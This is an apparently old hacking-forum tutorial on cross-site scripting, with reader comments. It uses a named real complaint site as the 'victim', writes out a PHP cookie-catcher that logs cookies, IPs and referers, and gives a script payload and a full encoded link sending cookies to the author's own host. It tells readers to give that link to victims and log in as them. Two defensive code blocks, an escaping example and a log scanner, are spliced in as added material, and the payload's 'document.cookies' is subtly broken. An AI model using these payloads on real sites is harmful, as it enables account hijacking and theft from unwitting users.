Hi guyz, this is Nishant Soni continuing the series of my articles for GeniusHackers members. After a long time of preparation, here I am launching another article, this time all about “XSS”, also known as “Cross Site Scripting”. I’d prefer to call it “XSS”. This article has turned out a little long since I have described everything in detail. If you read it with patience, I am sure you’re going to learn many things from it.
Little Background of XSS
XSS basically means using JavaScript in different forms to get hold of a user’s session details on the respective website. With the help of XSS we can steal the cookies of the owner of the website. XSS is a very large concept and your success rate depends on your imagination and experience. SQL injection and keylogging are the kind of things where you follow certain steps to execute something; XSS, on the other hand, is about understanding the ways JavaScript can be used, and the vulnerable spots of a website where your JavaScript gets executed may be in many different places. The very first thing I would like you guys to understand is the difference between Java and JavaScript.
So I could say that XSS, or Cross Site Scripting, means taking advantage of web applications that take user input but don’t filter it properly. This allows an attacker to inject HTML or other code and get some hidden information out of it. The most common information people look for with XSS is cookies. Cookies are used to maintain user authentication on the respective website.
Java & JavaScripts
Java is an object-oriented programming (OOP) language, created by James Gosling of Sun Microsystems. JavaScript was created by the staff of Netscape. The main difference is that Java is a self-executable program which works on its own on a Windows-based system; it is an independent program. JavaScript, on the other hand, is a carefully drafted piece of code which is executed by all internet browsers: it is placed in the HTML code of a website and displays the relevant information when the web page is opened.
What is XSS?
Again, a little theory: XSS means exploiting some part of a website to get access to unprivileged parts of the website and change them in ways you are not supposed to. As I said earlier, XSS totally depends on your imagination to find a vulnerability in the website. But here are the most common vulnerable spots which may give you an opportunity. Just try to go through them and understand them:
* Search terms :- Almost all websites have search boxes where you can search for something on the site. In the search box you can type your malicious script and check for the vulnerability.
* Text boxes :- Any other kind of text box on the website which lets you put some query into it.
So overall, we are trying to find a place where we can write something which will later be shown on the same web page. For example, if you put “angelina” in the search box, the next page should show something like “no search results found for ANGELINA” or “10 search results found for ANGELINA”. The only idea is that our search query should be echoed on the next page.
Types of XSS
There are 2 types of XSS vulnerability.
a. Persistent Cross Site Scripting
b. Non-persistent Cross site Scripting.
In this tutorial, I will explain “Persistent XSS” to you guyz, so you can understand how it works, and later on I will write another article about “Non-Persistent XSS”.
a. Persistent Cross Site Scripting:
A Persistent Cross Site Scripting vulnerability exists if the malicious code which you inject stays permanently on the respective website. To understand it better, I will give you a little example.
Suppose you find a forum which is vulnerable to XSS. Then you can create a “New Topic” or “New Thread” in the forum. Every time some user or the admin opens that particular thread, your code, which wasn’t filtered because of the lack of security on the website, gets executed, and the user’s or admin’s cookies are sent to you at a “cookie catcher”: a .php file stored on your own website, which could be on a free hosting service.
My Victim for this Tutorial
For this tutorial I am going to use “hellopeter.com”, which is a website where you can post your experiences with different companies’ customer service. So, without wasting any more time, let’s just open up the website.
Checking for Vulnerability
Now, the very first thing we have to find is a place where we can input some text which is later displayed. If you look carefully at the navigation on the left hand side, you will see a link to “Write a Report”, so there is a possibility that we might just get an opportunity in there. So let’s open up that page.
Check out the picture I have posted above: in that picture you will see that I have written “<u>Nishant” as my name in the field. Basically what I’m going to check with this is whether the next page shows my name underlined. If it does, the web page is not secured and is parsing all the HTML you put into it. So let’s click on Preview.
As you might have already noticed in the picture I posted above, the UNDERLINE starts right where my name has been placed. That means the website IS accepting the HTML input and putting it into the preview page without making any of the necessary changes. This may give us an XSS attack on this website. Before we actually input our malicious code, let’s have a look at the source of the web page so we know where it SHOULD HAVE been filtered.
Open up the picture above this: you will see that the name I wrote, “<u>Nishant”, looks exactly the same, so it didn’t filter out the tag. Let’s see what happens on a secured website.
For an example of a secure site, look at GeniusHackers.com: at the top right you see a search bar, so let’s put “<u>blah” in the search bar and hit enter. You will see that it says “no search results found”. But notice that it doesn’t say “No search results found for “<u>blah””. That means it is not ECHOING the word we put into the search bar, so there is no chance to exploit the search bar of GeniusHackers.
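To show the difference between the two sites above in code, here is an added example that is not part of the article: a vulnerable preview template that concatenates the “Name” field straight into the page beside a hardened one that HTML-encodes it first, plus the article's manual "<u>" probe turned into an automated check. The template is a constructed stand-in, not the real site's markup; plain Node.js, no dependencies.

```javascript
// Added example (not from the article). renderPreviewUnsafe reproduces the
// behaviour the article observes: whatever was typed becomes markup.
// renderPreviewSafe encodes the field for the HTML text context it lands in,
// so the browser shows the characters instead of interpreting them.
// The "<p>Reported by: ...</p>" template is a constructed stand-in.

// Replace every character with HTML meaning by its entity (text-node context).
function escapeHtml(input) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(input).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: user input is concatenated straight into the HTML.
function renderPreviewUnsafe(name) {
  return "<p>Reported by: " + name + "</p>";
}

// Hardened: same template, but the field is encoded before it is inserted.
function renderPreviewSafe(name) {
  return "<p>Reported by: " + escapeHtml(name) + "</p>";
}

// The article's manual probe, automated: push a harmless marker tag through a
// renderer and see whether it survives as a tag. true means the field is
// reflected unencoded and should be treated as an XSS finding.
function reflectsRawHtml(render) {
  const probe = "<u>xss-probe</u>";
  return render(probe).includes(probe);
}

// What the "<u>Nishant" test looks like on each side.
console.log(renderPreviewUnsafe("<u>Nishant")); // <p>Reported by: <u>Nishant</p>
console.log(renderPreviewSafe("<u>Nishant"));   // <p>Reported by: &lt;u&gt;Nishant</p>
```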
Testing Java Scripts
Now let’s continue with Hellopeter.com. Since we know that the website is vulnerable to XSS, we will try to run a small JavaScript on the website. We already know that the “Name” field is exploitable, so in that same field we will put our script, which should look as I have written below:
<script>alert("TEST")</script>
What this will do is pop up a little alert box saying “TEST”. If it does that, it means the site accepts JavaScript input as well. So let’s try it. Put the details as I have shown in the picture below.
Once you’re done, just click on the “Preview” button at the bottom, and on the next page you should get a popup that says “TEST”. Wow! Look at the picture below.
Example for finding Cookies.
Now, since we have seen that the website IS accepting JavaScript input and executing it on the next page, let’s try to do something else with JavaScript. First of all, I want you guyz to understand what cookies are and where you find them. Type the following command into the address bar of your web browser.
javascript:alert(document.cookie)
As soon as you type that command and hit enter, it should bring up a popup showing your cookies for the respective website. Make sure you are logged in when you check your cookies. As I said before, cookies are what hold the session information and log you in every time you visit the website.
By doing this you can see your own cookies, but it would not help an attack UNLESS we find some way to get those cookies sent to us. Now, let’s go back to the “WRITE A REPORT” page and try the following script in the “NAME” field.
Type what you see in the picture and click on Preview. When the next page loads, you should see a pop-up showing your own cookies to you. Now, let’s try to find a way to get these cookies sent to us with the help of JavaScript.
Creating Cookie Catcher.
A cookie catcher is a file which you upload to one of your web hosting accounts and whose permissions you change to 777 so it can record the cookies. Copy the following code and paste it into Notepad.
<?php
// the "c" query parameter carries the cookies that the injected script appends to the URL
$cookie = $_GET['c'];
$ip = getenv('REMOTE_ADDR');          // visitor's IP address
$date = date("j F, Y, g:i a");        // time of the visit
$referer = getenv('HTTP_REFERER');    // page the visitor came from
$fp = fopen('cookies.html', 'a');     // append to the log file
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: '.$ip.'<br> Date and Time: '.$date.'<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.TechMafias.com");   // send the visitor on
?>
Just a little elaboration on the script. The first statement gets the cookies; the following ones get the IP, the date and the referer. The last line sends the victim on to “TechMafias.com”. To make it a little less suspicious, you can change the link to hellopeter.com, so the victim wouldn’t see anything unusual. Copy the given code and put it into Notepad, then save it as something.php. Just make sure that you change the format to “.php”.
You’ll need a free web hosting account where you can upload the file. I personally use “t35.com”, so create an account there and upload this PHP file. Make sure that you change its permissions to “777”.
Testing Cookie Catcher.
Now, as you guyz have seen, we have been executing a little script on that page which brings up an alert box; let’s go a little more advanced. Let’s try to send our own cookies to our cookie catcher. Try the following script in the “Name” field:
<script>document.location="link-of-your-cookie-catcher?c=" + document.cookies</script>
Elaboration on the script.
document.location changes the location of the page, and we set it equal to the link of your cookie catcher with “?c=” added because the catcher reads a GET parameter. “+ document.cookies” appends the cookies of the victim’s site, so your cookie catcher is visited with them and can record them.
Here is the first screenshot, from when I uploaded my “cookiecatcher.php” to my t35 hosting account.
Now, here is the second.
Let’s try whether it works or not. I am going to use the script that I showed in the “WRITE A REPORT” page of hellopeter.com; I have posted the screenshot of it before.
Now, if you click on Preview, it will take you to TechMafias.com OR whatever you changed the link to in the cookie catcher. Now, log back in to your t35.com account, and you will notice another file, “cookies.html”, has been added automatically. Look at the screenshot below.
Now, if you open up the newly created file, you will notice some cookies inside it. It should look something like what is shown below.
Cookie: undefined
IP: MY IP
Date and Time: 21 April, 2009, 2:03 am
Referer: http://hellopeter.com/make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.techmafias.t35.com%2Fcookiecatcher2.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
Note: This will look a little different from actual cookies, because when I stole these I wasn’t logged in; if a user is logged in, you should get something a little different from this.
So now you can simply use those cookies in the “Cookie Editor” addon of Mozilla Firefox and log in as whoever you want.
Stealing Actual Cookies
Till now we were our own victim: we were trying to steal our own cookies to make sure this works. Now let’s try to get some actual victims. On this particular site, you have to PREVIEW the post first and then submit it. So the JavaScript gets executed whenever you preview it, and we can not submit it because the script has already executed. On other sites you can submit the post directly, so the moment someone opens it you get the cookies. But for this particular site we will have to do something else.
When you put the script in the “NAME” field and blah blah in the other fields and click on preview, the URL changes to something else for a moment, QUICKLY, before it redirects you to the website set in your cookie stealer. That is what you have to copy. What I copied was this:
http://hellopeter.com/make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.techmafias.t35.com%2Fcookiecatcher.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
Then you just give this link to your victim, and as soon as they click ON it, you get the cookies.
It is really useful because in other cases you wouldn’t have to ask the victims to click on the link; you would actually submit the report, so as soon as someone reads it you get the cookies.
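From the defender's side, the preview link above leaves a very recognisable trace: the URL-encoded <script> tag and the document.location / document.cookies pair show up in the request line and in the Referer of the catcher's own log. Here is an added example, not from the article, of a small detector that scans web server access-log lines (Apache/Nginx combined format) for exactly that pattern, including double-encoded variants. The log lines are constructed for this example and the host names are placeholders.

```javascript
// Added example (not from the article): flag access-log lines whose request
// target or Referer carries an encoded <script> tag, a document.location /
// document.cookie reference, or an alert() probe. Constructed sample log;
// "catcher.example" is a placeholder host.
const SAMPLE_LOG = [
  // Benign search; the only thing reflected is a plain word.
  '203.0.113.5 - - [21/Apr/2009:02:01:10 +0000] "GET /search.php?q=angelina HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  // Preview request whose "company" field carries the encoded exfiltration script.
  '203.0.113.5 - - [21/Apr/2009:02:03:01 +0000] "GET /make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fcatcher.example%2Fcc.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&person=whateva HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  // Double-encoded probe (%253C): a single decode pass would miss it.
  '198.51.100.7 - - [21/Apr/2009:02:04:30 +0000] "GET /search.php?q=%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 400 "-" "curl/7.19"',
];

// Decode repeatedly (up to maxRounds) so double-encoded payloads surface too.
function decodeFully(text, maxRounds = 3) {
  let cur = text.replace(/\+/g, " ");      // '+' is a space in form encoding
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; }  // malformed %xx: stop
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Patterns worth alerting on, checked against the decoded text.
const INDICATORS = [
  ["script_tag", /<\/?script\b/i],
  ["dom_exfil", /document\.(cookies?|location)\b/i],
  ["js_alert_probe", /\balert\s*\(/i],
];

function findIndicators(text) {
  const decoded = decodeFully(text);
  return INDICATORS.filter(([, re]) => re.test(decoded)).map(([name]) => name);
}

// Pull client IP, request target and Referer out of a combined-format line.
function parseLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+" \d+ \S+ "([^"]*)"/);
  return m ? { ip: m[1], target: m[2], referer: m[3] } : null;
}

// One hit per line that carries any indicator, with the sorted indicator names.
function scanLog(lines) {
  const hits = [];
  lines.forEach((line, idx) => {
    const req = parseLine(line);
    if (!req) return;
    const found = new Set([...findIndicators(req.target), ...findIndicators(req.referer)]);
    if (found.size) hits.push({ line: idx + 1, ip: req.ip, indicators: [...found].sort() });
  });
  return hits;
}

console.log(scanLog(SAMPLE_LOG));
```

Feeding a real access log through scanLog (one string per line) gives the line numbers and source IPs to look at first; the same patterns also apply to the Referer column of the catcher's cookies.html output shown above.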
Conclusion
Since XSS is a very BIG topic, I might have missed something; you guyz are free to ask your questions to learn more. I believe XSS is the best way to exploit a website. While writing this tutorial I found a new XSS VULNERABILITY in GOOGLE! With the help of that I can ACTUALLY HACK 1000s OF GOOGLE IDs. I have posted a screenshot of the XSS that I did on Google below. Check it out.
I am not showing the script to you guyz for security reasons. I have already reported this issue to Google and I am sure it will be fixed soon. Anyway, getting back to the point, I hope this article taught you something. This is just a part of the whole XSS magic; I will write another soon.
Major XSS in Past
I added this section just to make you guyz realize how dangerous XSS can be. There have been major hacking attempts on big networks in the past and some of them SUCCEEDED! Here are some examples.
1. Orkut: About 8 months ago, an XSS vulnerability was found in “Orkut Albums”, where you could inject malicious JavaScript into the “Caption” of the photos. This vulnerability existed for about 10 days. The effect was so massive that around 75,000+ accounts were hacked. It was fixed later on and some suspected “hackers’” accounts were suspended.
2. FaceBook: There was the same kind of vulnerability in FaceBook as in Orkut. In FaceBook too, the vulnerability was in ‘Albums’, where you could inject your scripts into the “Captions” of your photos. Around 45,000 IDs were hacked in JUST 2 days. FaceBook engineers were good enough to fix it in 2 days.
3. vBulletin: There was an XSS vulnerability in vBulletin version 3.6 and below, where an attacker could inject malicious code into any user’s profile as a “Visitor Message”. Many forums were hacked due to this.
Again, my name is Nishant.Soni, comments always appreciated. Another website that you can find me on is www.TechMafias.com
Have fun, Enjoy!
Guys, the pictures are so small and I can't see anything!!! So when he said type what's in the picture, the picture is so small I can't see anything!! Please fix it guys.
Hello Ali,
Corrected the pictures, sorry i was a bit lazy .
WoW
very informative…and the real hardcore hacking
Awesome…Mind blowing….
I learned a lot from this post…
I haven’t missed any posts of yours…and i dont hope to miss it in the future too..
[...] mind to provide an article on it.Alternatively you can also check the tutorial on XSS by Nihar.soni here.Thanx Nihar for the wonderful [...]
tnx for this article..=) keep up d good work guys
it was a interesting idea Nishant.Soni,and thanks for this report
what about the Non-persistent Cross site Scripting……..
Glad that u all liked it. and I am sorry guyz, kinda busy. Will launch the next tut soon.
hi,
Can you give me some sample JavaScripts which can be used for XSS of an application…
Regards,
Swetha
thats cool.. but i already knew that
Mind blowing, it helped me with proper coding and understanding the problems in my coding.
I would also be really happy if you kindly give me one more example of how to insert JavaScript code by XSS.
Really mind blowing man, when you are posting the next article about the same, please send me the link.
hi, nishant..
it is very nice article.. if u have more articles or any updates for the same pls mail me.. great article..
Ok, but what I don't understand is you said to send the link that you copied from the URL to the victim. Well, in this case it still takes action from the victim. I am still unclear how to retrieve cookies just by someone viewing the thread.
[Code]
ttp://hellopeter.com/make_comment_preview.php?inclination=0&company=%3Cscript%3Edocument.location%3D%22http%3A%2F%2Fwww.techmafias.t35.com%2Fcookiecatcher.php%3Fc%3D%22+%2B+document.cookies%3C%2Fscript%3E&location=whateva&countryId=9&industryId=27&person=whateva&problem=&other=&headline=whateva&incident=whateva&incidentcharsleft=1193&incident_day_select=21&incident_month_select=04&incident_year_select=2009&incident_hour_select=8&incident_min_select=30&incident_AMPM_select=AM&policyNo=&cellNo=&preview=Preview
And then , you just give this link to your victim, as soon as they click ON it, you get the cookies.
It is really useful because in other cases, you wouldn’t have to ask the victims to click on the link, you will actually submit the report. So as soon as someone reads it you get the cookies.
[/Code]
The last two paragraphs are what I'm having problems with.